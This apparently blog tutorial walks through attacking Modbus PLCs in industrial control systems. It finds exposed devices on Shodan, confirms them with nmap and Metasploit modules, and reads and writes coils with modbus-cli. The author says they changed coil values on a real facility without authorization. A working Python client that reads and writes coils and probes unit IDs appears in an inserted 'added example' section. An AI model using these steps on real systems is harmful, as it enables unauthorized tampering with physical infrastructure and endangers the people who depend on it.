
Exploiting SCADA/ICS Systems

  • Writer: Mike Corona-Gonzalez
  • Feb 11, 2024
  • 5 min read

Updated: Feb 15, 2024

Breaching a SCADA system is neither especially hard nor trivially easy; it comes down to using the right tools against the weaknesses built into these environments. This article walks through reaching an organization's SCADA network and interacting with its critical elements, including Programmable Logic Controllers (PLCs). We'll see how to talk to these devices and why, with Modbus, there is no authentication to bypass in the first place.


If you don’t know what these systems are, you can read more in the SCADA/ICS post.


We have to understand that SCADA/ICS systems do NOT only use the protocols we are used to from the TCP/IP/Ethernet world. Over 1000 different protocols are in use across SCADA/ICS, many of them originally developed for serial links and later carried over TCP/IP. Among the most popular is Modbus.


In this tutorial, we'll explore a command-line utility named modbus-cli. This Ruby-based tool is designed for interacting with Modbus installations: it can enumerate coils and read and write memory registers. It serves as a resource for security professionals assessing SCADA systems that use Modbus; conversely, the same tool could be employed by unethical hackers or cyber-warfare operatives to disrupt industrial systems.


Step 1: Download and install modbus-cli


modbus-cli is distributed as a Ruby gem (the gem is also named modbus-cli), so a working Ruby installation with RubyGems is the only prerequisite. Once installed, the tool is invoked as the modbus command, as the read and write steps later in this article show.

Step 2: Schneider Electric and Modicon Terminology


Before moving forward, let's pause to familiarize ourselves with some important terms. The modbus-cli tool understands both the memory terminology used by Modicon and the proprietary memory addressing scheme developed by Schneider Electric. For an overview of the Schneider Electric terminology, refer to the table in Schneider's official documentation; the key designations are summarized next.




Note that in this notation double words (32 bits) in memory are designated %MD, words (16 bits) %MW, bytes (8 bits) %MB and single bits %MX. modbus-cli's own command syntax uses %M for a coil (a single bit), %MW for a 16-bit word and %MD for a 32-bit double word, and the %M addresses are zero-based.


Step 3: Modicon Addressing


modbus-cli also accepts the Modicon memory address nomenclature.


  Modicon address    Object                            Access
  1-9999             Discrete output coils             read/write
  10001-19999        Discrete input contacts           read-only
  30001-39999        Analog input registers            read-only
  40001-49999        Analog output holding registers   read/write

As the table shows, discrete output coils have addresses 1-9999, discrete input contacts 10001-19999, analog input registers 30001-39999 and analog output holding registers 40001-49999. Only the coils and the holding registers can be written; the two input ranges are read-only. Modicon addresses are one-based, so Modicon coil 101 is coil offset 100 on the wire, which is the same coil the Schneider notation calls %M100.


Step 4: Find a Target on Shodan


Numerous methods exist to discover Internet-exposed ICS equipment, including Google hacking, nmap and Shodan; Shodan is my preferred tool. If you're not already a Shodan user, now would be an excellent time to create an account.


The modbus-cli tool is specifically designed for the Modbus protocol, one of many SCADA/ICS protocols. While this focus may seem narrow, Modbus is actually the most commonly implemented protocol across SCADA/ICS systems worldwide. To ensure broad compatibility, even devices not originally built around Modbus often support it, which eases integration with products from other manufacturers.


Modicon introduced Modbus in 1979, and Modicon has since become part of Schneider Electric of France. Modbus/TCP communicates over TCP port 502. Searching Shodan for port:502, or for "Schneider Electric" in the banners, can surface SCADA systems that speak Modbus.


In this example, I used the port:502 filter and restricted the results to Russia.


I am masking the IP address, as I don't want to get into any trouble for doing these types of attacks.



Step 5: Make sure we can ping the host and check whether port 502 is open

Before attacking (or when investigating an attack), the first thing to do is confirm that the IP address is reachable by pinging it. In this case the ping succeeded. Keep in mind that many ICS devices and perimeter firewalls drop ICMP, so a failed ping does not by itself mean the host is down; the port scan in the next step is the more reliable test.



Now let's run an nmap scan against the same IP address. I use it to check whether port 502 is open, since Modbus/TCP uses that port; nmap's modbus-discover script can additionally query the device for its slave ID and identification. In this case the port was open.



Step 6: Use msfconsole 


“msfconsole” is the main interface to Metasploit Framework (MSF), which is included in Kali Linux. Metasploit is a powerful and widely used tool for penetration testing and security auditing. It provides users with the ability to discover vulnerabilities, craft exploits, and execute security assessments in a structured and comprehensive manner.


We will use Metasploit to confirm that this IP address belongs to a functioning SCADA device with active coils.



In msfconsole, run search modbus to list the Modbus-related modules.



From the modules listed, two are relevant here: auxiliary/scanner/scada/modbusdetect and auxiliary/scanner/scada/modbus_findunitid.


modbusdetect sends a Modbus request to the target and checks for a valid Modbus reply, which confirms that a live Modbus/TCP service is running. modbus_findunitid then tries the possible unit IDs (the station address field in the Modbus/TCP header, 1-247 per the specification) and reports which ones answer without an exception. The point to notice is that no credentials are involved anywhere in this exchange: Modbus has no authentication, so any host that can reach port 502 can talk to the device.


In the example, modbusdetect confirmed that this system is a running Modbus device. Set RHOSTS to the target IP address and BENICE to 2, then run the module.



In the example, modbus_findunitid then found a unit ID that answered, and we were able to communicate with the system without any authentication.


Step 7: Address Terminology

Let's start by reading data from one of the Schneider Electric sites (the IP has been masked for privacy and security reasons). Before proceeding, though, we need the two ways of specifying addresses on Schneider Electric Modbus devices.


There are two addressing conventions for these devices and their values: the Schneider Electric mode and the Modicon mode. The Schneider Electric convention puts %M in front of the address (%M for a coil, %MW for a 16-bit word), whereas the Modicon convention uses the plain numeric ranges described earlier (1-9999 for coils, 40001-49999 for holding registers, and so on). We'll start with the Schneider convention and move on to the Modicon terminology afterwards.




Step 8: Reading the Values from the Functioning SCADA facility


Let's now try reading the values of the coils. These are Boolean (ON/OFF) values, stored as 1 or 0. We read from the Schneider address %M100, which is the same coil as Modicon address 101 (Schneider %M addresses are zero-based, Modicon coil addresses start at 1), and ask for 10 values:


modbus read IP ADDRESS %M100 10


The output showed coils 100, 101, 103, 105, 106 and 109 ON (1), while the others were OFF (0).




Step 9: Writing New Values to the Coils

Now let's see whether we can change the values of those coils. The write subcommand does this: starting at the same Schneider address, %M100, we write a 1 into each of the next three coils, turning coils 100, 101 and 102 ON. On a real PLC, coils are usually wired to physical outputs, so a write like this can switch real equipment; never do it outside an authorized engagement, and record the original values first so they can be restored.


modbus write <IP> %M100 1 1 1



Please note that I changed the values back afterwards.
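As an added example (not code from the page, and not modbus-cli's or Metasploit's own code), the following Python script shows what Steps 6, 8 and 9 do on the wire: it accepts both the Schneider (%M100) and Modicon (101) coil notations, builds Modbus/TCP Read Coils (function 0x01) and Write Multiple Coils (function 0x0F) frames, and probes unit IDs the way modbus_findunitid does. So that it runs offline, the target is a constructed in-process simulated PLC rather than a real device; its coil state, the unit IDs it serves (1 and 5) and the gateway exception it returns for any other unit ID are assumptions made for the demonstration. Only the coil table is handled; registers would use the other function codes from the Modicon table.

```python
# Added example (not modbus-cli's or the page's code): minimal Modbus/TCP client + simulated PLC
import socket, struct, threading

READ_COILS, WRITE_MULTIPLE_COILS = 0x01, 0x0F
EXC_ILLEGAL_FUNCTION, EXC_GATEWAY_TARGET_FAILED = 0x01, 0x0B

class ModbusException(Exception): ...

def parse_coil_address(text):
    # Schneider %M<n> is already the zero-based wire offset; Modicon coils 1-9999 are one-based
    s = str(text).strip().upper()
    if s.startswith("%M"):
        return int(s[2:])
    if not 1 <= int(s) <= 9999:
        raise ValueError(f"{text!r} is not a Modicon coil address")
    return int(s) - 1

def pack_bits(values):  # 8 coils per byte, lowest address in the least significant bit
    out = bytearray((len(values) + 7) // 8)
    for i, v in enumerate(values):
        out[i // 8] |= (v & 1) << (i % 8)
    return bytes(out)

def send_frame(sock, tid, unit, pdu):
    # MBAP header: transaction id, protocol id 0, length of (unit id + PDU), unit id; then the PDU
    sock.sendall(struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu)

def recv_frame(rfile):  # rfile: buffered reader over the socket, so short TCP reads are handled
    tid, _proto, length, unit = struct.unpack(">HHHB", rfile.read(7))
    return tid, unit, rfile.read(length - 1)

class ModbusClient:
    def __init__(self, host, port=502, unit=1):
        self.sock = socket.create_connection((host, port), timeout=3)
        self.rfile, self.unit, self.tid = self.sock.makefile("rb"), unit, 0
    def request(self, pdu, unit=None):
        # One request/response; a set 0x80 bit on the returned function code signals an exception
        self.tid = (self.tid + 1) & 0xFFFF
        send_frame(self.sock, self.tid, self.unit if unit is None else unit, pdu)
        _tid, _unit, rsp = recv_frame(self.rfile)
        if rsp[0] & 0x80:
            raise ModbusException(f"function 0x{rsp[0] & 0x7F:02X} exception 0x{rsp[1]:02X}")
        return rsp
    def read_coils(self, address, count):  # equivalent of: modbus read <ip> %M100 10
        rsp = self.request(struct.pack(">BHH", READ_COILS, parse_coil_address(address), count))
        return [(b >> i) & 1 for b in rsp[2:] for i in range(8)][:count]
    def write_coils(self, address, values):  # equivalent of: modbus write <ip> %M100 1 1 1
        data = pack_bits(values)
        pdu = struct.pack(">BHHB", WRITE_MULTIPLE_COILS, parse_coil_address(address), len(values), len(data))
        return struct.unpack(">H", self.request(pdu + data)[3:5])[0]  # quantity the device says it wrote
    def responds(self, uid):  # modbus_findunitid's test: does unit id `uid` answer without an exception?
        try:
            self.request(struct.pack(">BHH", READ_COILS, 0, 1), unit=uid)
            return True
        except ModbusException:
            return False

class SimulatedPLC(threading.Thread):
    # Constructed stand-in for the device: 256 coils, serves unit ids 1 and 5, checks no credentials
    def __init__(self):
        super().__init__(daemon=True)
        self.coils, self.units = [0] * 256, {1, 5}
        self.srv = socket.create_server(("127.0.0.1", 0))
        self.port = self.srv.getsockname()[1]
    def handle(self, unit, pdu):
        fc, (start, qty) = pdu[0], struct.unpack(">HH", pdu[1:5])
        if unit not in self.units:
            return bytes([fc | 0x80, EXC_GATEWAY_TARGET_FAILED])
        if fc == READ_COILS:
            data = pack_bits(self.coils[start:start + qty])
            return bytes([fc, len(data)]) + data
        if fc == WRITE_MULTIPLE_COILS:
            for i in range(qty):
                self.coils[start + i] = (pdu[6 + i // 8] >> (i % 8)) & 1
            return pdu[:5]  # write response echoes function code, start address and quantity
        return bytes([fc | 0x80, EXC_ILLEGAL_FUNCTION])
    def run(self):
        conn, _ = self.srv.accept()
        rfile = conn.makefile("rb")
        try:
            while True:
                tid, unit, pdu = recv_frame(rfile)
                send_frame(conn, tid, unit, self.handle(unit, pdu))
        except (OSError, struct.error):  # client went away or sent a malformed frame
            conn.close()

def demo():
    plc = SimulatedPLC()
    plc.start()
    for c in (100, 101, 103, 105, 106, 109):  # constructed state mirroring the page's read
        plc.coils[c] = 1
    cli = ModbusClient("127.0.0.1", plc.port)
    before = cli.read_coils("%M100", 10)
    units = [u for u in range(1, 10) if cli.responds(u)]
    written = cli.write_coils("%M100", [1, 1, 1])
    after = cli.read_coils("101", 10)  # the same ten coils, addressed in Modicon notation
    cli.write_coils("%M100", before[:3])  # put the coils back, as the page says it did
    return dict(before=before, units=units, written=written, after=after,
                restored=cli.read_coils("%M100", 10))
```

Running demo() reproduces the sequence of Steps 8 and 9 against the simulated device: the first read returns the constructed ON pattern for coils 100-109, the unit-ID probe reports only 1 and 5, the write reports three coils written, the second read (via the Modicon address 101) shows coils 100-102 all ON, and the final write restores the original pattern. Every byte of that exchange is an MBAP header plus a PDU; there is no field in which a password could even be carried, which is the whole reason the page's reads and writes succeed.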


Conclusion

modbus-cli is a powerful pentesting/hacking tool for the Modbus/TCP protocol used in SCADA/ICS systems. It is unacceptable that I was able to get into the system and change the values on the coils at all; this company should have at least some kind of security in place. If I had gone deeper into their system and changed all the values to random numbers, it would have caused lots of issues for this SCADA facility.


If you want to see how you can secure this system please read my other article, Securing SCADA/ICS systems.
